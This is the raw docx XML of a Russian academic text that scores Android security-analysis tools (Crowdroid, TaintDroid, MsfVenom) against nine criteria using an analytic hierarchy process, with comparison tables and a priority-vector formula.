      </w:r>
      <w:r w:rsidRPr="00630BBD">
        <w:t xml:space="preserve">Схема работы </w:t>
      </w:r>
      <w:r w:rsidRPr="00630BBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Crowdroid</w:t>
      </w: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354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t xml:space="preserve">озможность проведения </w:t>
      </w:r>
      <w:r w:rsidR="00345DD4">
        <w:t xml:space="preserve">непрерывного </w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t>анализа в режиме реального времени</w:t>
      </w:r>
      <w:r w:rsidR="00294D47" w:rsidRPr="00294D47">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00294D47">
        <w:t>К1)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124D2E" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t>втоматизированный запуск</w:t>
      </w:r>
      <w:r w:rsidR="00294D47">
        <w:t xml:space="preserve"> (К2)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124D2E" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t>нализ действий пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00294D47">
        <w:t xml:space="preserve"> (К3)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124D2E" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t>нализ на наличие вредоносного ПО</w:t>
      </w:r>
      <w:r w:rsidR="00294D47">
        <w:t xml:space="preserve"> (К4)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124D2E" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t>ейтральность для антивирусных систем</w:t>
      </w:r>
      <w:r w:rsidR="00294D47">
        <w:t xml:space="preserve"> (К5)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124D2E" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t>ростота использования</w:t>
      </w:r>
      <w:r w:rsidR="00294D47">
        <w:t xml:space="preserve"> (К6)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124D2E" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidR="00124D2E">
        <w:t>стойчивость к нестабильному соединению</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (К7),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C1D21" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidR="00294D47">
        <w:t>оступность</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (К8),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00294D47" w:rsidRPr="00112793" w:rsidRDefault="001354A0" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="007C1D21">
        <w:t>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r w:rsidR="001354A0">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15BD6" w:rsidRPr="00F15BD6" w:rsidRDefault="00F15BD6" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MsfVenom</w:t>
      </w:r>
      <w:r w:rsidR="001354A0">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15BD6" w:rsidRPr="00F15BD6" w:rsidRDefault="00F15BD6" w:rsidP="00112793">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TaintDroid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB15D4" w:rsidRDefault="00F15BD6" w:rsidP="00124ABE">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Построим матрицу характеристик каждой из альтернатив по выдвинутым критериям, которая представлена </w:t>
      </w:r>
      <w:r w:rsidR="00A311F6">
        <w:t>в таблице 2</w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15BD6" w:rsidRPr="003830E4" w:rsidRDefault="00F15BD6" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r w:rsidRPr="003830E4">
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="003830E4" w:rsidRPr="003830E4">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B8529C" w:rsidRPr="003830E4">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56"/>
        <w:gridCol w:w="889"/>
        <w:gridCol w:w="891"/>
        <w:gridCol w:w="891"/>
        <w:gridCol w:w="891"/>
        <w:gridCol w:w="892"/>
        <w:gridCol w:w="892"/>
        <w:gridCol w:w="895"/>
        <w:gridCol w:w="847"/>
        <w:gridCol w:w="800"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C1D21" w:rsidTr="007C1D21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1492" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="987" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="987" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="987" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1D21" w:rsidTr="007C1D21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1492" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>TaintDroid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1D21" w:rsidTr="00DF6765">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1492" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>Crowdroid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1D21" w:rsidTr="00124ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1492" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>MsfVenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984"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1</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7C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="007C1D21" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="007C1D21" w:rsidRPr="00DF6765" w:rsidRDefault="00345DD4" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00124ABE" w:rsidTr="00124ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1492" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00124ABE" w:rsidRDefault="00124ABE" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984"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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986"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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="987"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rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00124ABE" w:rsidRDefault="00124ABE" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00124ABE" w:rsidRDefault="00124ABE" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00962B68" w:rsidRDefault="00294D47" w:rsidP="00234CE1">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w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00B8529C">
        <w:t xml:space="preserve">.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w:t>
      </w:r>
      <w:r w:rsidR="00540839">
        <w:t>по формуле</w:t>
      </w:r>
      <w:r w:rsidR="00962B68">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00540839">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234CE1" w:rsidTr="00540839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00234CE1" w:rsidRDefault="00F870DF" w:rsidP="00712B2B">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:jc w:val="right"/>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e>
                    </m:nary>
                  </m:den>
                </m:f>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>,</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00234CE1" w:rsidRDefault="00923ABA" w:rsidP="00E271BB">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00962B68" w:rsidRDefault="00540839" w:rsidP="00540839">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidR="00962B68">
        <w:t xml:space="preserve">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962B68" w:rsidRPr="00962B68">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00962B68" w:rsidRPr="00962B68">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00962B68">
        <w:t>ый элемент локального вектора приоритетов</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962B68" w:rsidRDefault="00540839" w:rsidP="00540839">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00962B68" w:rsidRPr="0019431F">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>количество сравниваемых параметров;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8529C" w:rsidRDefault="00F870DF" w:rsidP="00540839">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>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oMath>
      <w:r w:rsidR="00540839" w:rsidRPr="00540839">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00540839">
        <w:t xml:space="preserve">показатель превосходства </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00540839">
        <w:t xml:space="preserve">-го параметра над </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>j</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00540839" w:rsidRPr="00540839">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00540839">
        <w:t>ым</w:t>
      </w:r>
      <w:r w:rsidR="00C118F3">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C118F3" w:rsidRDefault="00F870DF" w:rsidP="00540839">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>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oMath>
      <w:r w:rsidR="00C118F3">
        <w:t xml:space="preserve"> – произведение ряда</w:t>
      </w:r>
      <w:r w:rsidR="00712B2B">
        <w:t xml:space="preserve"> показателей превосходства </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00712B2B" w:rsidRPr="00712B2B">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00712B2B">
        <w:t>го параметра над остальными сравниваемыми</w:t>
      </w:r>
      <w:r w:rsidR="00C118F3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8529C" w:rsidRPr="00B8529C" w:rsidRDefault="00B8529C" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00FB15D4">
        <w:t>3</w:t>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31"/>
        <w:gridCol w:w="694"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="695"/>
        <w:gridCol w:w="668"/>
        <w:gridCol w:w="1116"/>
        <w:gridCol w:w="1370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00984403" w:rsidTr="00984403">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="863"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К2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="862" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="862"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К8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00F870DF" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>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DF6765" w:rsidRDefault="005E7E20" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Локальный приоритет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984403" w:rsidTr="00984403">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019"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0,396997</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,026755</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984403" w:rsidTr="00984403">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К2</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0,33</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0,317364</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,021388</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984403" w:rsidTr="00984403">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>К3</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0,20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1,009507</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00984403" w:rsidRPr="00DF6765" w:rsidRDefault="00984403" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6765">
              <w:t>0,068034</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984403" w:rsidTr="00984403">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1019"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3,00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0,33</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0,425119</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
